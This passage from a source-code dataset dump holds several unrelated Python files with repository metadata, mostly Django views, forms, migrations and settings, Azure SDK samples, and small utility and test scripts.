] | 905317742@qq.com |
47f47d17d3d69a25285ce3e88fbb0277e9f7b490 | 5bd49cdbd0dd04af74a98b96aba3a936512f40c9 | /datasetCode/resize_dataset.py | 5885e7fab30c69cac2e8e36f2d7780e41ab09c94 | [] | no_license | gombru/instaEmotions | fd78ca7a27ccd868bea239b98d5a8db895d945f8 | 94c0b69096e6aeb0c187aac8d76db49e379f9bc7 | refs/heads/master | 2021-05-09T23:21:14.938278 | 2018-02-13T08:25:19 | 2018-02-13T08:25:19 | 118,780,583 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,965 | py | # Resizes the images in a folder and creates a resized datasetcd in another
# It also filters corrupted images
import glob
from PIL import Image
from joblib import Parallel, delayed
import os
from shutil import copyfile
import time
json_filtered_path = "../../../hd/datasets/instaEmotions/json_filtered/"
im_dest_path = "../../../hd/datasets/instaEmotions/img_resized/"
minSize = 256
def resize(file):
try:
im_file = file.replace('json_filtered','img').replace('json','jpg')
im = Image.open(im_file)
w = im.size[0]
h = im.size[1]
# print "Original w " + str(w)
# print "Original h " + str(h)
if w < h:
new_width = minSize
new_height = int(minSize * (float(h) / w))
if h <= w:
new_height = minSize
new_width = int(minSize * (float(w) / h))
# print "New width "+str(new_width)
# print "New height "+str(new_height)
im = im.resize((new_width, new_height), Image.ANTIALIAS)
if not os.path.exists(im_dest_path + im_file.split('/')[-2]):
os.makedirs(im_dest_path + im_file.split('/')[-2])
im.save(im_dest_path + im_file.split('/')[-2] + '/' + im_file.split('/')[-1])
except:
print "Failed copying image. Removing caption " + str(file)
try:
# os.remove(file.replace("img", "json").replace("jpg", "json"))
os.remove(file)
# os.remove(file.replace("img", "json_filtered").replace("jpg", "json"))
except:
print "Cannot remove " + str(file)
return
print "Removed"
return
if not os.path.exists(im_dest_path):
os.makedirs(im_dest_path)
dirs = [dI for dI in os.listdir(json_filtered_path) if os.path.isdir(os.path.join(json_filtered_path, dI))]
c = 0
for dir in dirs:
print dir
Parallel(n_jobs=12)(delayed(resize)(file) for file in glob.glob(json_filtered_path + dir + "/*.json")) | [
"raulgombru@gmail.com"
] | raulgombru@gmail.com |
76527e924164481f7266a0971135b8d4ce87e829 | d66aa4c77f65bb837e07626c696b6dc886c7b1c1 | /base/Chapter-9/Chapter-9-3/Chapter-9-3.py | b9b07535566362568d6657934bc76850d1527ebf | [] | no_license | silianpan/Excel_to_Python | 2a789aec0eb38d3178be6dd44205792624d0d4c4 | 1c5890988c99b2939c4d98bb6a881e15d6c3ad7d | refs/heads/master | 2021-07-09T00:25:54.665343 | 2021-05-04T11:25:18 | 2021-05-04T11:25:18 | 242,090,461 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | # 自定义函数。
def level(number,lv1,lv2,lv3):
if number>=90:
return lv1
elif number>=60:
return lv2
elif number>=0:
return lv3
# 自定义函数的调用。
for score in [95,63,58,69,41,88,96]:
print(score,level(score,'优','中','差')) | [
"liu.pan@silianpan.cn"
] | liu.pan@silianpan.cn |
77cebbb34a0206d63b09f11451825731950f316b | 90419da201cd4948a27d3612f0b482c68026c96f | /sdk/python/pulumi_azure_nextgen/scheduler/latest/get_job_collection.py | 01c4ede4ea20f274e912f4161ff2a78f9a16fe18 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | test-wiz-sec/pulumi-azure-nextgen | cd4bee5d70cb0d332c04f16bb54e17d016d2adaf | 20a695af0d020b34b0f1c336e1b69702755174cc | refs/heads/master | 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 | Apache-2.0 | 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null | UTF-8 | Python | false | false | 3,835 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetJobCollectionResult',
'AwaitableGetJobCollectionResult',
'get_job_collection',
]
@pulumi.output_type
class GetJobCollectionResult:
def __init__(__self__, location=None, name=None, properties=None, tags=None, type=None):
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Gets or sets the storage account location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Gets or sets the job collection resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> 'outputs.JobCollectionPropertiesResponse':
"""
Gets or sets the job collection properties.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Gets or sets the tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Gets the job collection resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetJobCollectionResult(GetJobCollectionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetJobCollectionResult(
location=self.location,
name=self.name,
properties=self.properties,
tags=self.tags,
type=self.type)
def get_job_collection(job_collection_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetJobCollectionResult:
"""
Use this data source to access information about an existing resource.
:param str job_collection_name: The job collection name.
:param str resource_group_name: The resource group name.
"""
__args__ = dict()
__args__['jobCollectionName'] = job_collection_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:scheduler/latest:getJobCollection', __args__, opts=opts, typ=GetJobCollectionResult).value
return AwaitableGetJobCollectionResult(
location=__ret__.location,
name=__ret__.name,
properties=__ret__.properties,
tags=__ret__.tags,
type=__ret__.type)
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
4cd64a5900987513454fab8e412bc4c1b59e5930 | 9588581462e70c0fd8728da13771cc72dbb9691e | /src/python/interpret/test/test_interactive.py | 84126bedf8fa54bb79bee7d7aa223ce4414ea308 | [
"MIT"
] | permissive | anshuman-unilu/interpret | df88a34433e0fc82ea697109afbf56799c886068 | 79d4afe441e8f153ef13313d81b3dd0a09361be1 | refs/heads/master | 2020-05-24T07:40:18.372789 | 2019-05-16T23:31:44 | 2019-05-16T23:31:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 588 | py | # Copyright (c) 2019 Microsoft Corporation
# Distributed under the MIT software license
from ..visual.interactive import set_show_addr, get_show_addr, shutdown_show_server
def test_shutdown():
target_addr = ("127.0.0.1", 1337)
set_show_addr(target_addr)
actual_response = shutdown_show_server()
expected_response = True
assert actual_response == expected_response
def test_addr_assignment():
target_addr = ("127.0.0.1", 1337)
set_show_addr(target_addr)
actual_addr = get_show_addr()
assert target_addr == actual_addr
shutdown_show_server()
| [
"interpretml@outlook.com"
] | interpretml@outlook.com |
aeb1ba7b12cf83d1a171bfd95e019d04261e82be | bfe1d367f09969c5f99b66960d23bd23db2d1cfd | /migrations/versions/d7da7d3067a1_followers.py | 8862d09bb2ba3c2aaac8674c244ba8ca132e5f14 | [] | no_license | sockduct/myblog | f97ed3e97262ea2d175499fb3acb7eac98cd3567 | 1b0a30e21c119b6c494d2f6241ff346a3bbcd4e9 | refs/heads/master | 2022-12-08T22:35:08.921777 | 2018-12-27T11:31:32 | 2018-12-27T11:31:32 | 160,174,872 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 840 | py | """followers
Revision ID: d7da7d3067a1
Revises: 470ad871bbde
Create Date: 2018-11-20 07:53:39.417383
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd7da7d3067a1'
down_revision = '470ad871bbde'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('followers',
sa.Column('follower_id', sa.Integer(), nullable=True),
sa.Column('followed_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['followed_id'], ['user.id'], ),
sa.ForeignKeyConstraint(['follower_id'], ['user.id'], )
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('followers')
# ### end Alembic commands ###
| [
"james.r.small@outlook.com"
] | james.r.small@outlook.com |
a4ff7a1359bc8e2211bd34192f2b5c15102c5918 | 061a223e2207d9d8743979be1c64cf4a1ffa7920 | /src/pretix/base/migrations/0002_auto_20151021_1412.py | 69380c7e0f47d1430bc6ca50835ae1d940525e41 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | cygery/pretix | 925bf8e612f305d87aa9acbef02fa7697917a15c | 232c42b265bdbcd535dca2dec98c73dbca9becd9 | refs/heads/master | 2021-01-18T02:50:20.297908 | 2015-10-22T15:45:19 | 2015-10-22T15:45:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 502 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pretixbase', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='quota',
name='size',
field=models.PositiveIntegerField(help_text='Leave empty for an unlimited number of tickets.', verbose_name='Total capacity', blank=True, null=True),
),
]
| [
"mail@raphaelmichel.de"
] | mail@raphaelmichel.de |
7c38e98199e0c1619b75fb425ef013bfde8a52dc | 205e2d038ad3fd01e4072e5f7fcc0d32dbea341f | /06函数/03/function_bmi_upgrade.py | 7ca38bf21a62d1d00a09f7f99cd38defea8627e4 | [] | no_license | xiaohema233/LearnPythonWithZeroFoundation | b35cd95a13389a2d97ab4a4eff73fddb18ab85c8 | da9f4579b76e3b951dd0870664744014538fdb14 | refs/heads/master | 2022-10-24T10:42:30.453209 | 2020-06-13T07:32:00 | 2020-06-13T07:32:00 | 271,948,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,445 | py | def fun_bmi_upgrade(*person):
"""功能:根据身高和体重计算BMI指数(升级版)
*person:可变参数该参数中需要传递带3个元素的列表,
分别为姓名、身高(单位:米)和体重(单位:千克)
"""
for list_person in person:
for item in list_person:
person = item[0] # 姓名
height = item[1] # 身高(单位:米)
weight = item[2] # 体重(单位:千克)
print("\n" + "=" * 13, person, "=" * 13)
print("身高:" + str(height) + "米 \t 体重:" + str(weight) + "千克")
bmi = weight / (height * height) # 用于计算BMI指数,公式为“体重/身高的平方”
print("BMI指数:" + str(bmi)) # 输出BMI指数
# 判断身材是否合理
if bmi < 18.5:
print("您的体重过轻 ~@_@~")
if 18.5 <= bmi < 24.9:
print("正常范围,注意保持 (-_-)")
if 24.9 <= bmi < 29.9:
print("您的体重过重 ~@_@~")
if bmi >= 29.9:
print("肥胖 ^@_@^")
# *****************************调用函数***********************************#
list_w = [('绮梦', 1.70, 65), ('零语', 1.77, 50), ('黛兰', 1.72, 66)]
list_m = [('梓轩', 1.80, 75), ('冷伊一', 1.75, 70)]
fun_bmi_upgrade(list_w, list_m) # 调用函数指定可变参数
| [
"33052287+xiaohema233@users.noreply.github.com"
] | 33052287+xiaohema233@users.noreply.github.com |
e295fde13f0aa807766ef22576da20670075e3a5 | 82074ba616918ede605dec64b038546a7b07bd7d | /app/reports/report_amp.py | 57d0c3ba657966103e6c93e3b2adfc42283e2a16 | [] | no_license | chetankhopade/EmpowerRM | b7ab639eafdfa57c054a0cf9da15c3d4b90bbd66 | 8d968592f5e0d160c56f31a4870e79c30240b514 | refs/heads/main | 2023-07-05T03:20:13.820049 | 2021-08-26T11:56:28 | 2021-08-26T11:56:28 | 399,354,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,515 | py | import datetime
from datetime import timedelta
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect, JsonResponse
from django.shortcuts import render
from django.urls import reverse
from django.views.decorators.csrf import csrf_exempt
from app.management.utilities.exports import export_report_to_excel, export_report_to_csv
from app.management.utilities.functions import convert_string_to_date, datatable_handler, bad_json, dates_exceeds_range
from app.management.utilities.globals import addGlobalData
from app.reports.reports_structures import get_amp_report_structure
from erms.models import (ChargeBackLineHistory)
@login_required(redirect_field_name='ret', login_url='/login')
def view(request):
"""
User's AMP Report
"""
data = {'title': 'AMP Data Report', 'header_title': 'AMP Data Report'}
addGlobalData(request, data)
if not data['company'] or not data['has_access_to_company']:
return HttpResponseRedirect(reverse('companies'))
# activate menu option
data['menu_option'] = 'menu_reports'
return render(request, "reports/amp.html", data)
@login_required(redirect_field_name='ret', login_url='/login')
@csrf_exempt
def load_data(request):
"""
call DT Handler function with the required params: request, queryset and search_fields
"""
try:
# all ChargeBackLineHistory
start_date_str = request.POST.get('start_date', '')
end_date_str = request.POST.get('end_date', '')
start_date = None
end_date = None
if start_date_str and end_date_str:
start_date = convert_string_to_date(start_date_str)
end_date = convert_string_to_date(end_date_str)
# EA-1355 - limit all reports to pull only 2 years of data at most
date_range_exceeds = dates_exceeds_range(start_date, end_date, 2)
if date_range_exceeds:
return bad_json(message="Date range should not exceed beyond 2 years")
if start_date_str and not end_date_str:
start_date = convert_string_to_date(start_date_str)
end_date = convert_string_to_date(datetime.datetime.now().date().strftime('%m/%d/%Y'))
if end_date_str and not start_date_str:
end_date = convert_string_to_date(end_date_str)
start_date = end_date - timedelta(days=365)
queryset = None
if start_date and end_date:
queryset = ChargeBackLineHistory.objects.filter(updated_at__date__range=[start_date, end_date]).exclude(claim_amount_issue=0).order_by('cblnid')
if not queryset:
return JsonResponse({
'data': [],
'recordsTotal': 0,
'recordsFiltered': 0,
})
search_fields = ['cbtype', 'cb_cm_number', 'customer', 'distributor', 'distributor_city', 'distributor_state',
'distributor_zipcode', 'contract_name', 'contract_no', 'invoice_no', 'indirect_customer_name',
'indirect_customer_location_no', 'indirect_customer_address1', 'indirect_customer_address2',
'indirect_customer_city', 'indirect_customer_state', 'indirect_customer_zipcode', 'item_ndc',
'item_brand', 'item_description', 'item_uom', 'item_qty', 'wac_system', 'wac_submitted',
'claim_amount_system', 'claim_amount_submitted', 'cbnumber']
response = datatable_handler(request=request, queryset=queryset, search_fields=search_fields)
return JsonResponse(response)
except Exception as ex:
return bad_json(message=ex.__str__())
@login_required(redirect_field_name='ret', login_url='/login')
def export(request):
try:
export_to = request.GET.get('export_to', 'excel')
start_date_str = request.GET.get('sd', '')
end_date_str = request.GET.get('ed', '')
start_date = None
end_date = None
if start_date_str and end_date_str:
start_date = convert_string_to_date(start_date_str)
end_date = convert_string_to_date(end_date_str)
if start_date_str and not end_date_str:
start_date = convert_string_to_date(start_date_str)
end_date = convert_string_to_date(datetime.datetime.now().date().strftime('%m/%d/%Y'))
if end_date_str and not start_date_str:
end_date = convert_string_to_date(end_date_str)
start_date = end_date - timedelta(days=365)
cblines_history = []
if start_date and end_date:
cblines_history = ChargeBackLineHistory.objects.filter(updated_at__date__range=[start_date, end_date]).exclude(claim_amount_issue=0).order_by('cblnid')
time1 = datetime.datetime.now()
# Structure
structure = get_amp_report_structure()
# Export to excel or csv
if export_to == 'excel':
filename = f"{datetime.datetime.now().strftime('%Y-%m-%d')}_amp_report.xlsx"
response = export_report_to_excel(cblines_history, filename, structure)
else:
filename = f"{datetime.datetime.now().strftime('%Y-%m-%d')}_amp_report.csv"
response = export_report_to_csv(cblines_history, filename, structure)
time2 = datetime.datetime.now()
delta = (time2 - time1).total_seconds()
print(f"Delta Time Export: {delta} sec")
return response
except Exception as ex:
print(ex.__str__())
| [
"noreply@github.com"
] | chetankhopade.noreply@github.com |
39dd28a5b187c7e69548e7fb1a343b9abc4b6ff5 | dfeff5d7da852d8dfb4ab10cb9b6a902041eb313 | /website/forms.py | b7b4848a6ff8e8fac9c368ae8d34c1ecd967118b | [] | no_license | jdriscoll98/TorresLawPayments | adac6348e7e4dc0df01142f68b5ce91e1ecd5a8e | b9e59478866924a954f9c9d818b97ed1591d6a96 | refs/heads/master | 2021-06-21T05:30:18.019685 | 2020-01-22T02:46:14 | 2020-01-22T02:46:14 | 219,618,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,392 | py | from django import forms
from phonenumber_field.formfields import PhoneNumberField
class NewClientForm(forms.Form):
name = forms.CharField(max_length=200)
email = forms.EmailField(max_length=254)
phone_number = PhoneNumberField() # validators should be a list
monthly_payment = forms.DecimalField(max_digits=10, decimal_places=2)
total_amount_due = forms.DecimalField(max_digits=10, decimal_places=2)
admin_fee = forms.DecimalField(max_digits=10, decimal_places=2)
first_payment_date = forms.DateField(required=False)
def clean_monthly_payment(self):
monthly_payment = self.cleaned_data['monthly_payment']
if monthly_payment < 0:
raise forms.ValidationError("Please enter a positive value")
return monthly_payment
def clean_total_amount_due(self):
total_amount_due = self.cleaned_data['total_amount_due']
if total_amount_due < 0:
raise forms.ValidationError("Please enter a positive value")
return total_amount_due
# def clean_phone_number(self, form):
# data = self.cleaned_data['phone_number']
# if "fred@example.com" not in data:
# raise forms.ValidationError("You have forgotten about Fred!")
# # Always return a value to use as the new cleaned data, even if
# # this method didn't change it.
# return data
| [
"41447166+jdriscoll98@users.noreply.github.com"
] | 41447166+jdriscoll98@users.noreply.github.com |
ca4b0d329a6fa697df06e68aa0d627f9e1bc4182 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/communication/azure-communication-phonenumbers/samples/get_purchased_phone_number_sample.py | 562eff620cef4cf89444f8caff02db237857b51b | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,558 | py | # coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""
FILE:get_purchased_phone_number_sample.py
DESCRIPTION:
This sample demonstrates how to get the information from an acquired phone number using your connection string
USAGE:
python get_purchased_phone_number_sample.py
Set the environment variables with your own values before running the sample:
1) COMMUNICATION_SAMPLES_CONNECTION_STRING - The connection string including your endpoint and
access key of your Azure Communication Service
2) AZURE_PHONE_NUMBER - The phone number you want to get its information
"""
import os
from azure.communication.phonenumbers import (
PhoneNumbersClient
)
connection_str = os.getenv('COMMUNICATION_SAMPLES_CONNECTION_STRING')
phone_number = os.getenv("AZURE_PHONE_NUMBER") # e.g. "+18001234567"
phone_numbers_client = PhoneNumbersClient.from_connection_string(connection_str)
def get_purchased_phone_number_information():
purchased_phone_number_information = phone_numbers_client.get_purchased_phone_number(phone_number)
print('Phone number: ' + purchased_phone_number_information.phone_number)
print('Country code: ' + purchased_phone_number_information.country_code)
if __name__ == '__main__':
get_purchased_phone_number_information()
| [
"noreply@github.com"
] | Azure.noreply@github.com |
dd976bc4291db029b6f0a14de8e8e7701759e5b5 | dd2c8e0a8895ffb217813efb24568c34921cbcf1 | /tests/test_field.py | c7b16627cc419c58e0489f094a5f2a2bf2992cef | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | saxix/django-strategy-field | c543ccf101f473994da407def7671f1c2d1dba41 | 0c92b47976e39a4e8c06e5abfa21033af5a3e806 | refs/heads/develop | 2022-09-10T01:10:01.135944 | 2022-08-23T14:01:07 | 2022-08-23T14:01:07 | 26,797,927 | 17 | 3 | NOASSERTION | 2021-12-09T17:19:48 | 2014-11-18T07:45:50 | Python | UTF-8 | Python | false | false | 929 | py | import logging
import pytest
from django.core.mail.backends.filebased import EmailBackend
from demoproject.demoapp.models import DemoModelNoRegistry
logger = logging.getLogger(__name__)
# @pytest.mark.django_db
# def test_valid_class():
# d = DemoModelNoRegistry(klass='a.b.c')
# with pytest.raises(ValidationError):
# d.clean_fields()
class Dummy:
pass
@pytest.mark.django_db
def test_no_registry_assign_class():
d = DemoModelNoRegistry(klass=Dummy)
d.save()
assert d.klass == Dummy
@pytest.mark.django_db
def test_no_registry_assign_instance():
d = DemoModelNoRegistry(instance=Dummy)
d.save()
assert isinstance(d.instance, Dummy)
@pytest.mark.django_db
def test_no_registry_assign_string():
d = DemoModelNoRegistry(instance='django.core.mail.backends.filebased.EmailBackend')
d.save()
assert isinstance(d.instance, EmailBackend)
assert d.instance.open()
| [
"s.apostolico@gmail.com"
] | s.apostolico@gmail.com |
39641467aa7ab39ab1fcd6172a25743cbdf618ba | 3d705ec48c94373817e5f61d3f839988910431e3 | /lib/platform/dataprocess/testdata/MonthlyPeerActivity.py | 0ae6c9885b06e65b5deb4586b28678c73cfdb018 | [] | no_license | namesuqi/zeus | 937d3a6849523ae931162cd02c5a09b7e37ebdd8 | 3445b59b29854b70f25da2950016f135aa2a5204 | refs/heads/master | 2022-07-24T14:42:28.600288 | 2018-03-29T08:03:09 | 2018-03-29T08:03:09 | 127,256,973 | 0 | 0 | null | 2022-07-07T22:57:57 | 2018-03-29T07:53:16 | Python | UTF-8 | Python | false | false | 907 | py | import sys
import os
sys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + '..'))
def makeexpecteddata(hour=-1):
with open(os.path.abspath(os.path.dirname(__file__)) + '/../inputdata/MonthlyDistinctPeerID.txt', 'r') as resultfile:
orglines = resultfile.readlines()
expectedfile = open(os.path.abspath(os.path.dirname(__file__)) + "/../inputdata/%s.txt"%__name__.split('.')[-1],"w")
peeridprefix={}
for line in orglines:
peerid,_ = line.split(',')
if peerid[:8] not in peeridprefix:
peeridprefix[peerid[:8]] = 1
else:
peeridprefix[peerid[:8]] = peeridprefix[peerid[:8]] + 1
for prefix,count in peeridprefix.items():
expectedfile.write('%s,%d,%s\n' % (prefix,count,''))
expectedfile.close()
return os.path.abspath(os.path.dirname(__file__)) + "/../inputdata/%s.txt"%__name__.split('.')[-1]
| [
"suqi_name@163.com"
] | suqi_name@163.com |
e86e6c51e9f3fd1ff1426620e49ec00ce6d705e8 | 4a770290fe9201c39162cf0210d0d2b858f4b26a | /src/AuthTokenSerializer.py | 0783a415eeae394894ba3743fc42e60d7454765c | [] | no_license | FuckBrains/geekflex | 7e1d8783053313c301c8848d1aa23b03e8f5b0d6 | 72f048e336619f65c8558b7ec4bdf9ece53e71c3 | refs/heads/master | 2023-04-21T01:22:49.410096 | 2020-06-04T15:54:02 | 2020-06-04T15:54:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,680 | py | from django.contrib.auth import authenticate
from django.utils.translation import gettext_lazy as _
from rest_framework.exceptions import ValidationError
from rest_framework import serializers
from custom_exception_message import *
class AuthTokenSerializer(serializers.Serializer):
username = serializers.CharField(label=_("Username"))
password = serializers.CharField(
label=_("Password"),
style={'input_type': 'password'},
trim_whitespace=False,
required=False
)
auth_provider = serializers.CharField(required=False)
def validate(self, attrs):
print("attrs",attrs)
auth_provider = attrs.get('auth_provider')
# print("auth_provider",auth_provider)
#changes done by abhisek singh
if auth_provider.lower()== 'admin':
username = attrs.get('username')
password = attrs.get('password')
# if username is and password :
print("username",username,'password',password)
if username and password :
user = authenticate(request=self.context.get('request'),
username=username, password=password,auth_provider=auth_provider)
# The authenticate call simply returns None for is_active=False
# users. (Assuming the default ModelBackend authentication
# backend.)
if not user:
msg = _('Unable to log in with provided credentials.')
# raise serializers.ValidationError(msg, code='authorization')
raise CustomAPIException(None,msg,status_code=status.HTTP_200_OK)
else:
msg = _('Provided credentials with username and password cannot be blank .')
raise CustomAPIException(None,msg,status_code=status.HTTP_400_BAD_REQUEST)
elif auth_provider.lower()== 'kidsclub':
username = attrs.get('username')
password = attrs.get('password')
# if username is and password :
print("username",username,'password',password,'auth_provider',auth_provider)
if username and password :
# if (username is not None or username is not "") and (password is not None or password is not ""):
user = authenticate(request=self.context.get('request'),
username=username, password=password,auth_provider=auth_provider)
# The authenticate call simply returns None for is_active=False
# users. (Assuming the default ModelBackend authentication
# backend.)
if not user:
msg = _('Unable to log in with provided credentials.')
# raise serializers.ValidationError(msg, code='authorization')
raise CustomAPIException(None,msg,status_code=status.HTTP_200_OK)
else:
msg = _('Provided credentials with username and password cannot be blank .')
raise CustomAPIException(None,msg,status_code=status.HTTP_400_BAD_REQUEST)
elif auth_provider.lower()== 'subchild':
username = attrs.get('username')
password = attrs.get('password')
# if username is and password :
print("username",username,'password',password,'auth_provider',auth_provider)
if username and password :
# if (username is not None or username is not "") and (password is not None or password is not ""):
user = authenticate(request=self.context.get('request'),
username=username, password=password,auth_provider=auth_provider)
print("user",user)
# The authenticate call simply returns None for is_active=False
# users. (Assuming the default ModelBackend authentication
# backend.)
if not user:
msg = _('Unable to log in with provided credentials.')
# raise serializers.ValidationError(msg, code='authorization')
raise CustomAPIException(None,msg,status_code=status.HTTP_200_OK)
else:
msg = _('Provided credentials with username and password cannot be blank .')
raise CustomAPIException(None,msg,status_code=status.HTTP_400_BAD_REQUEST)
elif auth_provider.lower() == 'facebook' or auth_provider.lower() == 'google':
username = attrs.get('username')
if username :
user = authenticate(request=self.context.get('request'),
username=username,auth_provider=auth_provider)
# The authenticate call simply returns None for is_active=False
# users. (Assuming the default ModelBackend authentication
# backend.)
if not user:
msg = _('Unable to log in with provided credentials.')
# raise serializers.ValidationError(msg, code='authorization')
raise CustomAPIException(None,msg,status_code=status.HTTP_200_OK)
else:
msg = _('Must include "username" and "password".')
# raise serializers.ValidationError(msg, code='authorization')
raise ValidationError({
"error":{
'request_status': 0,
'msg': msg
}
})
attrs['user'] = user
return attrs | [
"abhishek.singh@shyamfuture.com"
] | abhishek.singh@shyamfuture.com |
cc74541a939aef0c5ad8e6b75077aa486fe02deb | 5d573c2e3a90e8c4e3b884d54aacd4a44d5d0b87 | /Python/python_stack/Django/main/apps/vinmyMVC/urls.py | 21c8fbe20ab9cff1240f9595f9784c6c44aa3994 | [] | no_license | RubenDuran/DojoAssignments | 42d12088feabee09eb1874da010e594b0eb7da18 | aa691ae2c41a35f632fa082fbf2eae60ea1f4601 | refs/heads/master | 2021-01-19T20:57:31.962140 | 2018-02-13T01:40:07 | 2018-02-13T01:40:07 | 88,580,713 | 0 | 2 | null | 2017-06-07T22:01:32 | 2017-04-18T04:14:30 | Python | UTF-8 | Python | false | false | 134 | py | from django.conf.urls import url d
from . import views
urlpatterns = [
url(r'^$', views.index),
url(r'^users$', views.show)
]
| [
"rd@rubenduran.net"
] | rd@rubenduran.net |
bf084a4d641ccb146774e29836ec3816e58686eb | 69cb95793176da6cc64c109028358184c04f0614 | /furniture_project/settings.py | 5722f6b28964c46f1ef0f7b26f6114b44ca1f5dd | [] | no_license | viralsir/furniture_project | e8b0275a175a058a3c49b841c53501ae0421b688 | 8823988eedf7d13844d429056cbebace12657790 | refs/heads/master | 2023-06-02T02:15:28.030895 | 2021-06-24T10:55:11 | 2021-06-24T10:55:11 | 379,879,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,417 | py | """
Django settings for furniture_project project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-e#0uv-2a7mtpse(9z9u=qg1ibcp9@b=&e_2!p0(lmiwb&=_b_*'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'users.apps.UsersConfig',
'crispy_forms',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'furniture_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates']
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'furniture_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
